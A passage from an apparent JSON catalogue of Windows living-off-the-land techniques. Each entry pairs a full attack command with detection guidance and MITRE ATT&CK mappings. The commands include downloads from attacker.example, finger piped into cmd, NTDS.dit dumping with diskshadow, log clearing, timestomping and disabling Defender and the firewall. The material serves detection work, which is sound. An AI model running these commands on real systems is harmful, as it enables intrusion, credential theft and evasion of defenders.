ADS) using the trusted Defender binary itself.", 616 "mitre": [ 617 "T1105", 618 "T1564.004" 619 ], 620 "privilege": "user", 621 "detection": "MpCmdRun.exe with -DownloadFile/-url/-path; MpCmdRun.exe launched from a non-Defender directory or by an unexpected parent; network egress from MpCmdRun.exe to non-Microsoft hosts; -path containing ':' (ADS).", 622 "references": [ 623 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/MpCmdRun.yml", 624 "https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/" 625 ], 626 "verifyNote": "LOLBAS MpCmdRun.yml quotes `-DownloadFile -url {REMOTEURL:.exe} -path {PATH:.exe}` (T1105, slashes/dashes both work) and the `-path {PATH}:evil.exe` ADS variant (T1564.004); match." 627 }, 628 { 629 "toolName": "desktopimgdownldr.exe", 630 "toolId": "desktopimgdownldr", 631 "platform": [ 632 "Windows" 633 ], 634 "capability": [ 635 "File Download", 636 "Defense Evasion" 637 ], 638 "nativeCategory": [ 639 "Download" 640 ], 641 "command": "set \"SYSTEMROOT=C:\\Windows\\Temp\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://attacker.example/x.exe /eventName:desktopimgdownldr", 642 "description": "The Personalization CSP lock-screen tool downloads the URL given in /lockscreenurl to disk as a standard user. Overriding the SYSTEMROOT environment variable redirects the output to an attacker-chosen folder, and the PersonalizationCSP registry value seeded by the run can be deleted afterward to erase the trace.", 643 "usecase": "Download an arbitrary file with a native, signed Windows tool that is not certutil/bitsadmin.", 644 "mitre": [ 645 "T1105" 646 ], 647 "privilege": "user", 648 "detection": "desktopimgdownldr.exe with /lockscreenurl to a non-Microsoft host or fetching a non-image; SYSTEMROOT environment override before the run; writes/deletes at HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl.", 649 "references": [ 650 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Desktopimgdownldr.yml", 651 "https://www.sentinelone.com/labs/living-off-windows-land-a-new-native-file-downldr/" 652 ], 653 "verifyNote": "LOLBAS Desktopimgdownldr.yml quotes `set \"SYSTEMROOT=...\" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL}` (T1105); SentinelOne write-up is the original research source." 654 }, 655 { 656 "toolName": "AppInstaller.exe", 657 "toolId": "appinstaller", 658 "platform": [ 659 "Windows" 660 ], 661 "capability": [ 662 "File Download" 663 ], 664 "nativeCategory": [ 665 "Download" 666 ], 667 "command": "start ms-appinstaller://?source=https://attacker.example/x.msix", 668 "description": "The ms-appinstaller:// URI is handled by the signed App Installer (AppInstaller.exe), which reaches out to the source URL, attempts to load/install the package, and caches the fetched file in INetCache. The download rides a trusted protocol handler with no obvious downloader on the command line; the same handler underpinned real-world MotW-bypass delivery campaigns.", 669 "usecase": "Download a remote file/package through a trusted URI handler rather than an explicit HTTP client.", 670 "mitre": [ 671 "T1105" 672 ], 673 "privilege": "user", 674 "detection": "AppInstaller.exe making outbound connections to non-Microsoft hosts; ms-appinstaller:// URI invocations (e.g. via explorer/start); files appearing in INetCache attributed to AppInstaller.exe; MSIX/APPX pulled from untrusted domains.", 675 "references": [ 676 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/AppInstaller.yml", 677 "https://attack.mitre.org/techniques/T1105/" 678 ], 679 "verifyNote": "LOLBAS AppInstaller.yml quotes `start ms-appinstaller://?source={REMOTEURL:.exe}` and notes the file is 'saved in INetCache' (T1105); match. ms-appinstaller MotW-bypass abuse is publicly documented (Microsoft disabled the handler in 2023)." 680 }, 681 { 682 "toolName": "OneDriveStandaloneUpdater.exe", 683 "toolId": "onedrivestandaloneupdater", 684 "platform": [ 685 "Windows" 686 ], 687 "capability": [ 688 "File Download", 689 "Defense Evasion" 690 ], 691 "nativeCategory": [ 692 "Download" 693 ], 694 "command": "reg add \"HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\" /v UpdateRingSettingURLFromOC /t REG_SZ /d https://attacker.example/x /f && OneDriveStandaloneUpdater.exe", 695 "description": "The signed OneDrive updater downloads from the URL stored in the user-writable registry value HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC. Setting that value and launching the updater fetches an attacker-controlled file while the process command line stays completely benign.", 696 "usecase": "Download a file from the internet with a signed updater and no anomalous command-line arguments.", 697 "mitre": [ 698 "T1105" 699 ], 700 "privilege": "user", 701 "detection": "writes to HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC; OneDriveStandaloneUpdater.exe connecting to hosts outside the official OneDrive/Office update CDNs.", 702 "references": [ 703 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/OneDriveStandaloneUpdater.yml", 704 "https://attack.mitre.org/techniques/T1105/" 705 ], 706 "verifyNote": "LOLBAS OneDriveStandaloneUpdater.yml documents downloading from the URL in HKCU\\...\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC (T1105); match (LOLBAS also notes ODSUUpdateXMLUrlFromOC/UpdateXMLUrlFromOC must be non-empty)." 707 }, 708 { 709 "toolName": "finger.exe", 710 "toolId": "finger", 711 "platform": [ 712 "Windows" 713 ], 714 "capability": [ 715 "File Download", 716 "Execution" 717 ], 718 "nativeCategory": [ 719 "Download" 720 ], 721 "command": "finger user@attacker.example | more +2 | cmd", 722 "description": "The built-in Finger client retrieves data from a remote Finger (TCP/79) server; piping the server's response through more and into cmd turns the response into executed commands, giving a combined download-and-execute (and C2) channel over an unusual port with a signed binary.", 723 "usecase": "Retrieve and run attacker-supplied commands/payload over the rarely-monitored finger protocol.", 724 "mitre": [ 725 "T1105" 726 ], 727 "privilege": "user", 728 "detection": "finger.exe making outbound TCP/79 connections to external hosts; finger.exe piped into cmd.exe/powershell.exe/more; any use of finger.exe at all, which is rare in modern environments.", 729 "references": [ 730 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Finger.yml", 731 "https://attack.mitre.org/techniques/T1105/" 732 ], 733 "verifyNote": "LOLBAS Finger.yml quotes `finger user@example.host.com | more +2 | cmd` verbatim (T1105, Download); exact match." 734 }, 735 { 736 "toolName": "wsl.exe", 737 "toolId": "wsl", 738 "platform": [ 739 "Windows", 740 "Linux" 741 ], 742 "capability": [ 743 "Execution", 744 "File Download" 745 ], 746 "nativeCategory": [ 747 "Execute", 748 "Download" 749 ], 750 "command": "wsl.exe --exec bash -c \"id > /mnt/c/Windows/Temp/x\"\nwsl.exe --exec bash -c 'cat < /dev/tcp/10.10.10.10/54 > /tmp/x'", 751 "description": "wsl.exe (signed, present where WSL is installed) runs arbitrary Linux commands via --exec/-e (as root with -u root, no password), giving indirect command execution under a trusted binary. bash's /dev/tcp pulls files with no external tool. wsl.exe also resolves its install path from HKLM\\...\\Lxss\\MSI\\InstallLocation, so a planted wsl.exe there is executed instead of the legitimate one.", 752 "usecase": "Execute payloads on the Linux side (evading Windows EDR), transfer files via /dev/tcp, or masquerade a payload as WSL.", 753 "mitre": [ 754 "T1202", 755 "T1105", 756 "T1218" 757 ], 758 "privilege": "user", 759 "detection": "wsl.exe with -e/--exec/-u root; wsl.exe/bash.exe spawning children outside System32; changes to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation; /dev/tcp usage inside WSL bash.", 760 "references": [ 761 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Wsl.yml", 762 "https://attack.mitre.org/techniques/T1202/" 763 ], 764 "verifyNote": "LOLBAS Wsl.yml documents `wsl.exe --exec bash -c \"{CMD}\"` (T1202), `wsl.exe --exec bash -c 'cat < /dev/tcp/.../.. > binary'` (T1105), and the HKLM\\...\\Lxss\\MSI\\InstallLocation lookup; match." 765 }, 766 { 767 "toolName": "winget.exe", 768 "toolId": "winget", 769 "platform": [ 770 "Windows" 771 ], 772 "capability": [ 773 "Execution", 774 "AWL / Policy Bypass" 775 ], 776 "nativeCategory": [ 777 "Execute", 778 "AWL Bypass" 779 ], 780 "command": "winget.exe install --manifest C:\\Windows\\Temp\\x.yml\nwinget.exe install --accept-package-agreements -s msstore {StoreID}", 781 "description": "The Windows Package Manager installs from a local manifest (--manifest) whose Installer URL points at an arbitrary file that is then downloaded and executed, or installs a Microsoft Store package by ID even when the Store app is blocked and AppLocker is active. Either path fetches and runs code through a signed installer, bypassing application-control policy.", 782 "usecase": "Download-and-execute an arbitrary installer, or pull software from the Store, past AppLocker/Store restrictions.", 783 "mitre": [ 784 "T1105", 785 "T1218" 786 ], 787 "privilege": "user", 788 "detection": "winget.exe install --manifest referencing a local/temp .yml; winget pulling installers from non-standard hosts; msstore installs where the Store app is policy-blocked; winget-spawned installer processes writing to unusual locations.", 789 "references": [ 790 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Winget.yml", 791 "https://learn.microsoft.com/en-us/windows/package-manager/winget/install" 792 ], 793 "verifyNote": "LOLBAS Winget.yml quotes `winget.exe install --manifest {PATH:.yml}` (download+execute, T1105) and `winget.exe install --accept-package-agreements -s msstore {name/ID}` (AWL Bypass, installs even if Store app blocked); match." 794 }, 795 { 796 "toolName": "devtunnel.exe", 797 "toolId": "devtunnel", 798 "platform": [ 799 "Windows", 800 "Linux", 801 "macOS" 802 ], 803 "capability": [ 804 "File Upload", 805 "File Download" 806 ], 807 "nativeCategory": [ 808 "Download", 809 "Upload", 810 "Exfiltration" 811 ], 812 "command": "devtunnel.exe host -p 8080", 813 "description": "The Microsoft Dev Tunnels agent (signed) exposes a local port/service on a Microsoft-hosted public *.devtunnels.ms URL. This creates an ingress/egress channel that can be used to reach internal services, stage tooling, or exfiltrate data, with the traffic riding trusted Microsoft tunneling infrastructure.", 814 "usecase": "Establish a trusted-domain tunnel for data transfer, exfiltration, or exposing an internal service to the internet.", 815 "mitre": [ 816 "T1105", 817 "T1572", 818 "T1567" 819 ], 820 "privilege": "user", 821 "detection": "devtunnel.exe execution and persistent connections to *.devtunnels.ms / global.rel.tunnels.api.visualstudio.com; internal services becoming reachable via a Microsoft tunnel domain; unexpected long-lived outbound sessions from devtunnel.exe.", 822 "references": [ 823 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/", 824 "https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/cli-commands" 825 ], 826 "verifyNote": "Microsoft Learn CLI reference documents `devtunnel host -p 3000` exposing a local port at a public *.devtunnels.ms URL; LOLBAS entry exists at OtherMSBinaries/devtunnels/ (reference URL corrected from the 404ing raw-YAML path to the working LOLBAS site page + MS Learn)." 827 }, 828 { 829 "toolName": "Teams.exe", 830 "toolId": "teams", 831 "platform": [ 832 "Windows", 833 "macOS", 834 "Linux" 835 ], 836 "capability": [ 837 "Execution", 838 "Defense Evasion" 839 ], 840 "nativeCategory": [ 841 "Execute" 842 ], 843 "command": "Teams.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\Temp\\x.exe &&\"", 844 "description": "Classic Microsoft Teams is an Electron/Chromium app, and the Chromium --gpu-launcher switch runs an arbitrary command as a child of the signed Teams binary (system binary proxy execution / parent masquerading). The same abuse applies to other Electron apps, and Teams can also be made to run planted JavaScript from its app.asar/package.json.", 845 "usecase": "Proxy-execute a command under a trusted, signed Electron binary to blend with normal process trees.", 846 "mitre": [ 847 "T1218.015" 848 ], 849 "privilege": "user", 850 "detection": "Teams.exe (or any Electron app) launched with --gpu-launcher/--disable-gpu-sandbox/--utility-cmd-prefix; Teams.exe spawning cmd.exe/powershell.exe; unexpected writes to app.asar or package.json under %LOCALAPPDATA%\\Microsoft\\Teams.", 851 "references": [ 852 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Teams.yml", 853 "https://attack.mitre.org/techniques/T1218/015/" 854 ], 855 "verifyNote": "LOLBAS Teams.yml quotes `teams.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"` and the app.asar/package.json JavaScript variants, all MitreID T1218.015 (Electron Applications); match." 856 }, 857 { 858 "toolName": "diskshadow.exe", 859 "toolId": "diskshadow", 860 "platform": [ 861 "Windows" 862 ], 863 "capability": [ 864 "Execution", 865 "Credential Access" 866 ], 867 "nativeCategory": [ 868 "Execute", 869 "Dump" 870 ], 871 "command": "diskshadow.exe /s C:\\Windows\\Temp\\x.txt", 872 "description": "diskshadow's script mode (/s) runs each line of a text script; an exec line spawns a child process under a signed binary (indirect execution), while its VSS commands (set/create/expose) snapshot a volume so locked files like NTDS.dit or the SAM/SYSTEM hives can be copied out of the shadow copy. One signed tool covers both proxy execution and credential-store theft.", 873 "usecase": "Proxy-execute a command and/or snapshot the volume to copy NTDS.dit and registry hives for offline credential extraction.", 874 "mitre": [ 875 "T1202", 876 "T1003.003" 877 ], 878 "privilege": "admin", 879 "detection": "diskshadow.exe /s with a script file; diskshadow creating/exposing shadow copies; child processes spawned by diskshadow.exe; reads of NTDS.dit or SAM/SYSTEM via a shadow-copy path shortly after a snapshot.", 880 "references": [ 881 "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Diskshadow.yml", 882 "https://attack.mitre.org/techniques/T1003/003/" 883 ], 884 "verifyNote": "LOLBAS Diskshadow.yml documents `diskshadow.exe /s {PATH:.txt}` (T1003.003, NTDS exfil via VSS) and `exec {PATH:.exe}` child-process spawn (T1202); FIX: removed T1006 — not in the LOLBAS mapping and diskshadow's VSS snapshot is squarely T1003.003, so only T1202+T1003.003 are retained." 885 }, 886 { 887 "toolName": "wevtutil.exe", 888 "toolId": "wevtutil", 889 "platform": [ 890 "Windows" 891 ], 892 "capability": [ 893 "Defense Evasion" 894 ], 895 "nativeCategory": [ 896 "Indicator Removal", 897 "Clear Windows Event Logs" 898 ], 899 "command": "wevtutil cl Security", 900 "description": "The built-in event log utility clears (empties) a named Windows Event Log channel with the cl / clear-log verb, destroying recorded evidence. An optional /bu: switch backs the log up first; adversaries omit it.", 901 "usecase": "Erase Security/System/Application logs after intrusion activity to remove indicators of compromise.", 902 "mitre": [ 903 "T1070.001" 904 ], 905 "privilege": "admin", 906 "detection": "Alert on Security Event ID 1102 (audit log cleared) and System 104 (log file cleared). Log process creation (Sysmon 1 / Security 4688) for wevtutil.exe with 'cl' or 'clear-log' arguments; forward events to a SIEM so cleared local copies still survive centrally.", 907 "references": [ 908 "https://attack.mitre.org/techniques/T1070/001/", 909 "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil" 910 ], 911 "verifyNote": "MS Learn wevtutil doc confirms 'cl|clear-log <Logname> [/bu:<Backup>]' clears a log (docs example: wevtutil cl Application /bu:...); maps to ATT&CK T1070.001. No change." 912 }, 913 { 914 "toolName": "wevtutil.exe", 915 "toolId": "wevtutil", 916 "platform": [ 917 "Windows" 918 ], 919 "capability": [ 920 "Defense Evasion" 921 ], 922 "nativeCategory": [ 923 "Impair Defenses", 924 "Disable Windows Event Logging" 925 ], 926 "command": "wevtutil sl Security /e:false", 927 "description": "The set-log (sl) verb with /e:false disables a Windows Event Log channel so future events for that channel are no longer written, blinding defenders without clearing existing entries.", 928 "usecase": "Disable Security or PowerShell operational channels before running noisy tooling so nothing is recorded.", 929 "mitre": [ 930 "T1562.002", 931 "T1070.001" 932 ], 933 "privilege": "admin", 934 "detection": "Monitor process creation (Sysmon 1 / 4688) for wevtutil.exe with 'sl' plus '/e:false'. Watch Event ID 1100/1102/4719 (audit policy or log service state change) and alert on any channel being disabled, especially Security, System, and Microsoft-Windows-PowerShell/Operational.", 935 "references": [ 936 "https://attack.mitre.org/techniques/T1562/002/", 937 "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil" 938 ], 939 "verifyNote": "MS Learn wevtutil doc confirms 'sl|set-log' with '/e:<Enabled>' where Enabled is true or false ('Enables or disables a log'); primary ATT&CK ID T1562.002 is accurate (T1070.001 is a related secondary tag). No change." 940 }, 941 { 942 "toolName": "Clear-EventLog", 943 "toolId": "powershell", 944 "platform": [ 945 "Windows" 946 ], 947 "capability": [ 948 "Defense Evasion" 949 ], 950 "nativeCategory": [ 951 "Indicator Removal", 952 "Clear Windows Event Logs" 953 ], 954 "command": "Clear-EventLog -LogName Security", 955 "description": "The Windows PowerShell 5.1 Clear-EventLog cmdlet deletes all entries from a specified classic event log on a local or remote computer, an alternative to wevtutil for the same log-clearing effect.", 956 "usecase": "Clear event logs from within an existing PowerShell session without spawning wevtutil.exe.", 957 "mitre": [ 958 "T1070.001" 959 ], 960 "privilege": "admin", 961 "detection": "Alert on Event ID 1102/104 as with any clear. Enable PowerShell Script Block Logging (4104) and Module Logging to capture the Clear-EventLog invocation; correlate with Sysmon 1 for powershell.exe. Sysmon's own channel typically survives a Security-log clear and preserves the trail.", 962 "references": [ 963 "https://attack.mitre.org/techniques/T1070/001/", 964 "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/clear-eventlog" 965 ], 966 "verifyNote": "MS Learn confirms Clear-EventLog 'deletes all of the entries from the specified event logs on the local computer or on remote computers' (classic-log cmdlet, requires Administrators); ATT&CK T1070.001. No change." 967 }, 968 { 969 "toolName": "Remove-EventLog", 970 "toolId": "powershell", 971 "platform": [ 972 "Windows" 973 ], 974 "capability": [ 975 "Defense Evasion" 976 ], 977 "nativeCategory": [ 978 "Indicator Removal", 979 "Clear Windows Event Logs" 980 ], 981 "command": "Remove-EventLog -LogName Security", 982 "description": "The Windows PowerShell 5.1 Remove-EventLog cmdlet deletes a classic event log entirely and unregisters its event sources, which can suppress future logging for that log until it is recreated (often after reboot).", 983 "usecase": "Delete and deregister a log so the intrusion leaves less evidence and future events are not captured.", 984 "mitre": [ 985 "T1070.001" 986 ], 987 "privilege": "admin", 988 "detection": "Capture the cmdlet via Script Block Logging (4104) and Sysmon 1 for powershell.exe. Baseline the expected set of registered event logs and alert when a standard log (Security, System, Application) is missing or its sources are deregistered.", 989 "references": [ 990 "https://attack.mitre.org/techniques/T1070/001/", 991 "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/remove-eventlog?view=powershell-5.1" 992 ], 993 "verifyNote": "MS Learn (PS 5.1) confirms Remove-EventLog 'deletes an event log file ... and unregisters all its event sources'; classic EventLog cmdlet (5.1 only, not PS7). No change." 994 }, 995 { 996 "toolName": "auditpol.exe", 997 "toolId": "auditpol", 998 "platform": [ 999 "Windows" 1000 ], 1001 "capability": [ 1002 "Defense Evasion" 1003 ], 1004 "nativeCategory": [ 1005 "Impair Defenses", 1006 "Disable Windows Event Logging" 1007 ], 1008 "command": "auditpol /set /category:\"System\" /success:disable /failure:disable", 1009 "description": "The built-in audit policy tool sets a subcategory or category to stop generating success/failure audit events; auditpol /clear /y wipes the entire advanced audit policy. Either action suppresses the events defenders rely on.", 1010 "usecase": "Turn off auditing for noisy categories (e.g. process creation, logon) before operating, so key telemetry is never written.", 1011 "mitre": [ 1012 "T1562.002" 1013 ], 1014 "privilege": "admin", 1015 "detection": "Alert on Event ID 4719 (System audit policy was changed) and 4907. Log process creation for auditpol.exe with '/set ... /success:disable', '/failure:disable', '/clear', or '/remove'. Periodically compare live 'auditpol /get /category:*' output against a known-good baseline.", 1016 "references": [ 1017 "https://attack.mitre.org/techniques/T1562/002/", 1018 "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol" 1019 ], 1020 "verifyNote": "MS Learn auditpol-set confirms '/set ... /category:<name> /success:<enable|disable> /failure:<enable|disable>' and auditpol '/clear'/'/remove' sub-commands; ATT&CK T1562.002. No change." 1021 }, 1022 { 1023 "toolName": "fsutil.exe", 1024 "toolId": "fsutil", 1025 "platform": [ 1026 "Windows" 1027 ], 1028 "capability": [ 1029 "Defense Evasion" 1030 ], 1031 "nativeCategory": [ 1032 "Indicator Removal", 1033 "Delete Volume USN Journal" 1034 ], 1035 "command": "fsutil usn deletejournal /d C:", 1036 "description": "The fsutil usn deletejournal subcommand with /d disables the NTFS Update Sequence Number (USN) change journal on a volume and deletes its records, destroying a key forensic timeline of file creation, deletion, and modification.", 1037 "usecase": "Wipe the NTFS change journal to hamper forensic reconstruction of file-level activity on a compromised host.", 1038 "mitre": [ 1039 "T1070" 1040 ], 1041 "privilege": "admin", 1042 "detection": "Log process creation (Sysmon 1 / 4688) for fsutil.exe with 'usn' and 'deletejournal'. During forensics, a reset USN journal ID or an abrupt discontinuity/gap in journal records indicates deletion; ship file-audit and journal data off-host in near real time.", 1043 "references": [ 1044 "https://attack.mitre.org/techniques/T1070/", 1045 "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn" 1046 ], 1047 "verifyNote": "MS Learn fsutil-usn confirms 'fsutil usn deletejournal {/d|/n} <volumepath>' with '/d' disabling the active USN change journal (docs example: fsutil usn deletejournal /d c:); ATT&CK T1070. No change." 1048 }, 1049 { 1050 "toolName": "attrib.exe", 1051 "toolId": "attrib", 1052 "platform": [ 1053 "Windows" 1054 ], 1055 "capability": [ 1056 "Defense Evasion" 1057 ], 1058 "nativeCategory": [ 1059 "Hide Artifacts", 1060 "Hidden Files and Directories" 1061 ], 1062 "command": "attrib +h +s C:\\Windows\\Temp\\x\\payload.exe", 1063 "description": "The built-in attrib command sets the Hidden (+h) and System (+s) file attributes so a file is concealed from default Explorer and 'dir' views, a simple way to hide dropped artifacts on disk.", 1064 "usecase": "Conceal a dropped executable or staging file from casual inspection of a directory.", 1065 "mitre": [ 1066 "T1564.001" 1067 ], 1068 "privilege": "user", 1069 "detection": "Log process creation (Sysmon 1 / 4688) for attrib.exe with '+h' and especially '+s' on files in user-writable paths (Temp, ProgramData, AppData). Hunt the file system for files carrying both Hidden and System attributes in atypical locations.", 1070 "references": [ 1071 "https://attack.mitre.org/techniques/T1564/001/", 1072 "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/attrib" 1073 ], 1074 "verifyNote": "MS Learn attrib doc confirms '{+|-}h' sets the Hidden and '{+|-}s' sets the System file attribute; ATT&CK T1564.001. No change." 1075 }, 1076 { 1077 "toolName": "PowerShell", 1078 "toolId": "powershell", 1079 "platform": [ 1080 "Windows" 1081 ], 1082 "capability": [ 1083 "Defense Evasion" 1084 ], 1085 "nativeCategory": [ 1086 "Indicator Removal", 1087 "Timestomp" 1088 ], 1089 "command": "$(Get-Item C:\\Windows\\Temp\\x\\payload.exe).LastWriteTime = '01/01/2016 00:00:00'; [IO.File]::SetCreationTime('C:\\Windows\\Temp\\x\\payload.exe','01/01/2016')", 1090 "description": "PowerShell can rewrite a file's $STANDARD_INFORMATION timestamps via the .CreationTime/.LastWriteTime/.LastAccessTime properties of a FileInfo object or the [System.IO.File]::SetCreationTime/SetLastWriteTime .NET methods, blending a malicious file in with legitimate neighbors (timestomping).", 1091 "usecase": "Backdate or match a dropped file's MACE timestamps to defeat timeline analysis and 'recently modified' triage.", 1092 "mitre": [ 1093 "T1070.006" 1094 ], 1095 "privilege": "user", 1096 "detection": "Sysmon Event ID 2 (FileCreateTime changed) flags user-mode $SI edits. Capture Script Block Logging (4104) for '.CreationTime =', '.LastWriteTime =', '[IO.File]::SetCreationTime', etc. In MFT forensics, a $STANDARD_INFORMATION timestamp earlier than the matching $FILE_NAME timestamp is a classic timestomp signature.", 1097 "references": [ 1098 "https://attack.mitre.org/techniques/T1070/006/", 1099 "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md" 1100 ], 1101 "verifyNote": "MS Learn .NET docs confirm System.IO.File.SetCreationTime/SetLastWriteTime and the FileInfo LastWriteTime/CreationTime settable properties; Atomic Red Team T1070.006 documents PowerShell timestomp; ATT&CK T1070.006. No change." 1102 }, 1103 { 1104 "toolName": "Add-MpPreference", 1105 "toolId": "powershell", 1106 "platform": [ 1107 "Windows" 1108 ], 1109 "capability": [ 1110 "Defense Evasion" 1111 ], 1112 "nativeCategory": [ 1113 "Impair Defenses", 1114 "Disable or Modify Tools" 1115 ], 1116 "command": "Add-MpPreference -ExclusionPath 'C:\\Windows\\Temp\\x'\nAdd-MpPreference -ExclusionProcess 'C:\\Windows\\Temp\\x\\payload.exe'\nAdd-MpPreference -ExclusionExtension 'exe'", 1117 "description": "The Defender module's Add-MpPreference cmdlet adds entries to the Microsoft Defender Antivirus exclusion list so matching items are no longer scanned in real time or on schedule: -ExclusionPath excludes a folder/file, -ExclusionProcess excludes any files opened by a named process, and -ExclusionExtension excludes an entire file type. Any of the three carves a blind spot for staging and executing tooling.", 1118 "usecase": "Carve a Defender blind spot by excluding a staging path, an attacker process, or a whole extension before dropping tooling.", 1119 "mitre": [ 1120 "T1562.001" 1121 ], 1122 "privilege": "admin", 1123 "detection": "Monitor Defender Operational Event ID 5007 (configuration changed) and registry writes under HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\{Paths|Processes|Extensions} (Sysmon 13). Capture Add-MpPreference via Script Block Logging (4104) and alert on any new exclusion, especially paths/processes in Temp/AppData/ProgramData and extension-wide exclusions (rarely legitimate on endpoints). Enable Tamper Protection and centrally alert on exclusion drift.", 1124 "references": [ 1125 "https://attack.mitre.org/techniques/T1562/001/", 1126 "https://learn.microsoft.com/en-us/powershell/module/defender/add-mppreference" 1127 ], 1128 "verifyNote": "MERGED from three near-duplicate Add-MpPreference exclusion entries (same toolId + same command intent — adding a Defender AV exclusion, all T1562.001). MS Learn confirms -ExclusionPath ('disables Windows Defender scheduled and real-time scanning for files in this folder'), -ExclusionProcess ('excludes any files opened by the processes that you specify'), and -ExclusionExtension ('exclude from scheduled, custom, and real-time scanning'); the three write to the Exclusions Paths/Processes/Extensions registry subkeys respectively. Technique mapping unchanged." 1129 }, 1130 { 1131 "toolName": "Set-MpPreference", 1132 "toolId": "powershell", 1133 "platform": [ 1134 "Windows" 1135 ], 1136 "capability": [ 1137 "Defense Evasion" 1138 ], 1139 "nativeCategory": [ 1140 "Impair Defenses", 1141 "Disable or Modify Tools" 1142 ], 1143 "command": "Set-MpPreference -DisableRealtimeMonitoring $true", 1144 "description": "The Defender module's Set-MpPreference cmdlet with -DisableRealtimeMonitoring $true turns off Microsoft Defender Antivirus real-time protection, stopping on-access scanning of files and processes host-wide.", 1145 "usecase": "Disable real-time protection so subsequent malicious files execute without being scanned or quarantined.", 1146 "mitre": [ 1147 "T1562.001" 1148 ], 1149 "privilege": "admin", 1150 "detection": "Alert on Defender Operational Event ID 5001 (real-time protection disabled) and 5007/5010. Capture 'Set-MpPreference -DisableRealtimeMonitoring' and related '-Disable*' toggles via Script Block Logging (4104). Enable Tamper Protection, which blocks this change and logs the attempt.", 1151 "references": [ 1152 "https://attack.mitre.org/techniques/T1562/001/", 1153 "https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference" 1154 ], 1155 "verifyNote": "MS Learn confirms Set-MpPreference -DisableRealtimeMonitoring (Boolean) governs real-time protection; Defender Operational Event ID 5001 (real-time protection disabled) / 5007 (config changed) confirmed via Microsoft community/Sentinel guidance; ATT&CK T1562.001. No change." 1156 }, 1157 { 1158 "toolName": "reg.exe", 1159 "toolId": "reg", 1160 "platform": [ 1161 "Windows" 1162 ], 1163 "capability": [ 1164 "Defense Evasion" 1165 ], 1166 "nativeCategory": [ 1167 "Impair Defenses", 1168 "Modify Registry" 1169 ], 1170 "command": "reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f", 1171 "description": "The built-in reg.exe writes the legacy DisableAntiSpyware policy value to turn off Microsoft Defender Antivirus via the registry. Modern Windows blocks or ignores this value under Tamper Protection, but the write attempt itself is a well-known evasion indicator.", 1172 "usecase": "Attempt to disable Defender through a policy registry key rather than the Defender cmdlets.", 1173 "mitre": [ 1174 "T1562.001", 1175 "T1112" 1176 ], 1177 "privilege": "admin", 1178 "detection": "Monitor registry writes to HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware (Sysmon 13) and process creation for reg.exe targeting that key. Tamper Protection generates Defender Event ID 5007 on the blocked attempt; treat any DisableAntiSpyware write as malicious on managed endpoints.", 1179 "references": [ 1180 "https://attack.mitre.org/techniques/T1562/001/", 1181 "https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware" 1182 ], 1183 "verifyNote": "MS Learn DisableAntiSpyware doc confirms the value disables Defender AV and that it is now ignored/removed on modern Windows and protected by Tamper Protection (platform 4.18.2108.4+) - matching the entry's caveat; reg.exe add /v /t REG_DWORD /d /f is standard; ATT&CK T1562.001 + T1112. No change." 1184 }, 1185 { 1186 "toolName": "netsh.exe", 1187 "toolId": "netsh", 1188 "platform": [ 1189 "Windows" 1190 ], 1191 "capability": [ 1192 "Defense Evasion" 1193 ], 1194 "nativeCategory": [ 1195 "Impair Defenses", 1196 "Disable or Modify System Firewall" 1197 ], 1198 "command": "netsh advfirewall set allprofiles state off", 1199 "description": "The built-in netsh advfirewall context sets the state of all Windows Defender Firewall profiles (Domain, Private, Public) to off, removing host-based network controls that would otherwise limit inbound/outbound activity.", 1200 "usecase": "Turn off the host firewall to allow attacker tooling, C2, or lateral-movement traffic unimpeded.", 1201 "mitre": [ 1202 "T1562.004" 1203 ], 1204 "privilege": "admin", 1205 "detection": "Log process creation (Sysmon 1 / 4688) for netsh.exe with 'advfirewall' and 'state off'. Alert on Windows Firewall Event ID 2003 (a firewall setting was changed) and 2009. Also watch sc.exe/net.exe targeting the MpsSvc service. Enforce firewall state centrally via GPO/Intune and alert on drift.", 1206 "references": [ 1207 "https://attack.mitre.org/techniques/T1562/004/", 1208 "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netsh-advfirewall" 1209 ], 1210 "verifyNote": "MS 